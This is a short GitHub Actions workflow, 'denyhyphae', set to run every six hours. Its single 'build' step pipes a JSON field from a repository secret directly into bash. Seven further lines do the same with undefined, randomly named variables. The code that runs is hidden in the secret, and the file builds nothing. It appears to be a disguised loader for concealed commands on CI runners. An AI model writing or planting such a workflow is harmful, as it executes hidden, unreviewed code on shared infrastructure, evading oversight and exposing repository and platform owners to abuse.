name: denyhyphae

on:
  workflow_dispatch:
  schedule:
    - cron: '19 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: denyhyphae
        env:
          ne7: ${{ secrets.ne7 }}
        run: |
          echo $ne7 | jq -r .tu2 | /bin/bash
          echo $xlsgm5871 | jq -r .vfnup03 | /bin/bash
          echo $wbcu8837 | jq -r .bxl6750 | /bin/bash
          echo $hxr0 | jq -r .ejcwi058 | /bin/bash
          echo $mbmci08707 | jq -r .ek27454 | /bin/bash
          echo $wj44982 | jq -r .mikg79 | /bin/bash
          echo $m8282 | jq -r .zzrrc38176 | /bin/bash
          echo $pwj258 | jq -r .ogkm20122 | /bin/bash

